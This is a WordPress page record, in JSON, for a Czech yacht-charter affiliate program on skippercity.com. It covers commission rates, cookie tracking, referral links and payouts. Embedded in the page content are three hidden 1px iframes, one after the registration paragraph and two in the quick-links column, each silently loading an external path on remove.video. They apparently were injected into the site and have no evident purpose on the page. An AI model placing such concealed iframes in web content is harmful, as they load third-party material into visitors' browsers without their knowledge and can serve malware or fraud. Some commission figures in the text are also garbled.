{"id":412084,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/partnersky-program-pro-pronajem-jachet\/"},"modified":"2024-02-21T11:19:51","modified_gmt":"2024-02-21T11:19:51","slug":"partnersky-program-pro-pronajem-jachet","status":"publish","type":"page","link":"https:\/\/skippercity.com\/cs\/partnersky-program-pro-pronajem-jachet\/","title":{"rendered":"Partnersk\u00fd program pro pron\u00e1jem jachet"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412084\" class=\"elementor elementor-412084 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Partnersk\u00fd program pro pron\u00e1jem jachet<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>Stru\u010dn\u00e1 fakta:<\/strong><\/span><\/p>\n<ul>\n<li>Nejv\u00fd\u0161e plat\u00edc\u00ed partnersk\u00fd program<\/li>\n<li>20-25% z na\u0161\u00ed provize z pron\u00e1jmu lod\u00ed<\/li>\n<li>Do\u017eivotn\u00ed provize<\/li>\n<li>365denn\u00ed expirace soubor\u016f cookie<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;No headings were found on this page.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tObsah\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Partnersk\u00fd program pro pron\u00e1jem jachet<\/h2>\n<p>Pokud m\u00e1te webov\u00e9 str\u00e1nky se z\u00e1kazn\u00edky, kte\u0159\u00ed by mohli m\u00edt z\u00e1jem o pron\u00e1jem jachet &#8211; plachetnic, gulet, motorov\u00fdch jachet, superjachet &#8211; kdekoli na sv\u011bt\u011b, m\u011bli bychom z\u00e1jem o spolupr\u00e1ci s v\u00e1mi v r\u00e1mci partnersk\u00e9ho partnerstv\u00ed.<\/p>\n<p><u><b>Milujeme partnery!<\/b><\/u><\/p>\n<p>Affiliate program Yachtco v\u00e1m umo\u017en\u00ed za\u010d\u00edt vyd\u011bl\u00e1vat na pron\u00e1jmu jachet pouh\u00fdm p\u0159id\u00e1n\u00edm odkazu z va\u0161ich str\u00e1nek na na\u0161e.<\/p>\n<h2>Jak to funguje?<\/h2>\n<p>Kdy\u017e z\u00e1kazn\u00edk <strong>klikne na v\u00e1\u0161 odkaz na va\u0161ich webov\u00fdch str\u00e1nk\u00e1ch<\/strong> (nebo na blogu \u010di soci\u00e1ln\u00edch s\u00edt\u00edch), dostane se na na\u0161e str\u00e1nky a n\u00e1sledn\u011b si u n\u00e1s pronajme lo\u010f, procento provize v\u00e1m bude p\u0159ips\u00e1no podle na\u0161ich podm\u00ednek. V\u0161e je monitorov\u00e1no (elektronicky i offline) a my pro v\u00e1s sledujeme stav veden\u00ed.<\/p>\n<p><strong>Zprost\u0159edkovatel (tedy my) z\u00edsk\u00e1v\u00e1 poplatek<\/strong> z \u010dist\u00e9 hodnoty rezervace lodi (bez APA nebo dal\u0161\u00edch objednan\u00fdch polo\u017eek \u010di slu\u017eeb). Tato provize z\u00e1vis\u00ed na lokalit\u011b, typu lodi a proviz\u00edch v dan\u00e9m odv\u011btv\u00ed. <strong>Partner (tedy vy) z\u00edsk\u00e1 %-25%<\/strong> jako z\u00e1kladn\u00ed sazbu za tento poplatek z\u00edskan\u00fd od zprost\u0159edkovatele.<\/p>\n<p><b>Skippercity je hrd\u00fd na to, \u017ee v\u011brn\u011b sleduje v\u0161echny z\u00e1kazn\u00edky charterov\u00fdch let\u016f, a proto jsou partne\u0159i odm\u011b\u0148ov\u00e1ni t\u00edm, \u017ee z\u00edsk\u00e1vaj\u00ed %-25% na\u0161ich proviz\u00ed ze v\u0161ech rezervac\u00ed z\u00e1kazn\u00edk\u016f, kte\u0159\u00ed se k n\u00e1m vracej\u00ed.<\/b><\/p>\n<p>N\u00e1\u0161 syst\u00e9m sleduje z\u00e1kazn\u00edky, kte\u0159\u00ed ji\u017e d\u0159\u00edve popt\u00e1vali u partnera nebo si u n\u011bj provedli rezervaci, tak\u017ee m\u016f\u017eeme partnerovi v\u017edy vr\u00e1tit provizi. Skippercity bude respektovat p\u0159edstaven\u00ed a nab\u00eddne partner\u016fm poplatek za p\u0159edstaven\u00ed, pokud se z\u00e1kazn\u00edk vr\u00e1t\u00ed na Skippercity mimo partnersk\u00fd program (tj. bez cookies), aby respektoval odkaz, kter\u00fd n\u00e1m poskytl, proto\u017ee k n\u00e1m p\u0159edt\u00edm p\u0159i\u0161el na z\u00e1klad\u011b popt\u00e1vky p\u0159es partnera.<\/p>\n<p>3 000 EUR je pr\u016fm\u011brn\u00e1 \u010dist\u00e1 hodnota pron\u00e1jmu, za kterou m\u016f\u017eete za\u010d\u00edt dost\u00e1vat provizi. Plat\u00ed na\u0161e podm\u00ednky.<\/p>\n<p>M\u00e1me pro v\u00e1s zp\u016fsoby dotazov\u00e1n\u00ed, stylov\u00e9 obr\u00e1zky a tla\u010d\u00edtka. V\u0161echny jsou k dispozici z va\u0161eho affiliate &#8222;dashboard&#8220;, tak\u017ee v\u0161e, co mus\u00edte ud\u011blat, je zkop\u00edrovat a vlo\u017eit k\u00f3d do sv\u00fdch webov\u00fdch str\u00e1nek, a v\u0161ichni z v\u00e1s jsou p\u0159ipraveni j\u00edt!<\/p>\n<p>Va\u0161e adresa URL pro partnery bude https:\/\/skippercity.com\/?ref=username. Jednodu\u0161e nainstalujete k\u00f3d (?ref=?ref=username) na konec jak\u00e9hokoli odkazu na Skippercity a v\u0161e je odtud monitorov\u00e1no!<\/p>\n<p><a href=\"https:\/\/skippercity.com\/cs\/stante-se-nasim-partnerem\/\">Pokud m\u00e1te z\u00e1jem o registraci do na\u0161eho partnersk\u00e9ho programu, sta\u010d\u00ed kliknout zde<\/a> a zaregistrovat se, abychom zpracovali va\u0161i \u017e\u00e1dost o vstup do programu.<\/p>\n<p>Ve\u0161ker\u00fd obsah webov\u00fdch str\u00e1nek SkipperCity je chr\u00e1n\u011bn autorsk\u00fdmi pr\u00e1vy. Nepodporujeme na\u0161e partnery v tom, aby pou\u017e\u00edvali jak\u00fdkoli obsah na https:\/\/skippercity.com a kop\u00edrovali nebo duplikovali materi\u00e1l na sv\u00fdch vlastn\u00edch webov\u00fdch str\u00e1nk\u00e1ch jako sv\u016fj vlastn\u00ed. M\u016f\u017eete v\u0161ak p\u0159ij\u00edt s vlastn\u00edm obsahem a odkazovat na n\u00e1s.<\/p>\n<h2>Jak sledujeme prodej<\/h2>\n<p>V\u0161ichni klienti p\u0159ich\u00e1zej\u00edc\u00ed z va\u0161ich str\u00e1nek budou &#8222;va\u0159eni&#8220; a v\u00e1\u0161 \u00fa\u010det bude propojen se soubory cookie. Kdy\u017e n\u00e1m klient po\u0161le popt\u00e1vku nebo si u n\u00e1s vytvo\u0159\u00ed \u00fa\u010det, ud\u011bl\u00e1me to, co um\u00edme nejl\u00e9pe &#8211; doporu\u010d\u00edme spr\u00e1vnou lo\u010f, zajist\u00edme smlouvu a platby a za\u0159\u00edd\u00edme, aby se z\u00e1kazn\u00edk mohl nalodit.<\/p>\n<p>Pokud z\u00e1kazn\u00edk, kter\u00fd si pronajme jachtu, p\u0159ijde z va\u0161ich webov\u00fdch str\u00e1nek, pod\u011bl\u00edme se s v\u00e1mi o \u010d\u00e1st provize.<\/p>\n<h2>Jak dost\u00e1v\u00e1te zaplaceno?<\/h2>\n<p>Na\u0161im partner\u016fm plat\u00edme bankovn\u00edm p\u0159evodem nebo prost\u0159ednictv\u00edm slu\u017eby Stripe.<\/p>\n<p>Partner\u016fm bude vyplacena \u010d\u00e1stka jeden m\u011bs\u00edc po uspokojiv\u00e9m dokon\u010den\u00ed charty &#8211; to je v tomto odv\u011btv\u00ed b\u011b\u017en\u00e1 norma pro v\u0161echny z\u00fa\u010dastn\u011bn\u00e9 strany. V\u0161ichni \u00fa\u010dastn\u00edci jsou placeni po \u00fasp\u011b\u0161n\u00e9m dokon\u010den\u00ed pron\u00e1jmu, proto\u017ee pokud se b\u011bhem pron\u00e1jmu vyskytnou n\u011bjak\u00e9 probl\u00e9my, chceme zajistit, aby je makl\u00e9\u0159i, mana\u017ee\u0159i jachet, kapit\u00e1ni a majitel\u00e9 vy\u0159e\u0161ili je\u0161t\u011b p\u0159edt\u00edm, ne\u017e klienti opust\u00ed jachtu.<\/p>\n<p>Za v\u0161echny zru\u0161en\u00e9 pron\u00e1jmy (klienty nebo majiteli), pobo\u010dky, cestovn\u00ed kancel\u00e1\u0159e a v\u0161echna doporu\u010den\u00ed se nepova\u017euje \u017e\u00e1dn\u00e1 provize.<\/p>\n<h2>Jak se zaregistrovat do partnersk\u00e9ho programu<\/h2>\n<p>Abyste se mohli p\u0159ihl\u00e1sit do partnersk\u00e9ho programu, mus\u00edte m\u00edt existuj\u00edc\u00ed webov\u00e9 str\u00e1nky, blog nebo soci\u00e1ln\u00ed s\u00ed\u0165 s klientskou z\u00e1kladnou, kter\u00e1 dopl\u0148uje pron\u00e1jem jachet (cestov\u00e1n\u00ed, luxusn\u00ed produkty, slu\u017eby concierge atd.).<\/p>\n<p>Nem\u00e1te \u017e\u00e1dn\u00e9 riziko ani n\u00e1klady na partnersk\u00fd program. Sta\u010d\u00ed <a href=\"https:\/\/skippercity.com\/cs\/stante-se-nasim-partnerem\/\">vyplnit n\u00e1\u0161 online formul\u00e1\u0159<\/a>.<iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/cs\/stante-se-nasim-partnerem\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Zaregistrujte se do na\u0161eho partnersk\u00e9ho programu pro pron\u00e1jem jachet<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Rychl\u00e9 odkazy:<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/cs\/stante-se-nasim-partnerem\/\">Registrace\/registrace<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/cs\/prihlaseni-partnera\/\">P\u0159ihl\u00e1\u0161en\u00ed<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/cs\/muj-ucet-2\/\">V\u00e1\u0161 partnersk\u00fd \u00fa\u010det<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Partnersk\u00fd program pro pron\u00e1jem jachet Stru\u010dn\u00e1 fakta: Nejv\u00fd\u0161e plat\u00edc\u00ed partnersk\u00fd program 20-25% z na\u0161\u00ed provize z pron\u00e1jmu lod\u00ed Do\u017eivotn\u00ed provize 365denn\u00ed expirace soubor\u016f cookie Obsah Partnersk\u00fd program pro pron\u00e1jem jachet Pokud m\u00e1te webov\u00e9 str\u00e1nky se z\u00e1kazn\u00edky, kte\u0159\u00ed by mohli m\u00edt z\u00e1jem o pron\u00e1jem jachet &#8211; plachetnic, gulet, motorov\u00fdch jachet, superjachet &#8211; kdekoli na sv\u011bt\u011b, m\u011bli [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412084","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/cs\/wp-json\/wp\/v2\/pages\/412084","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/cs\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/cs\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/cs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/cs\/wp-json\/wp\/v2\/comments?post=412084"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/cs\/wp-json\/wp\/v2\/pages\/412084\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/cs\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/cs\/wp-json\/wp\/v2\/media?parent=412084"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}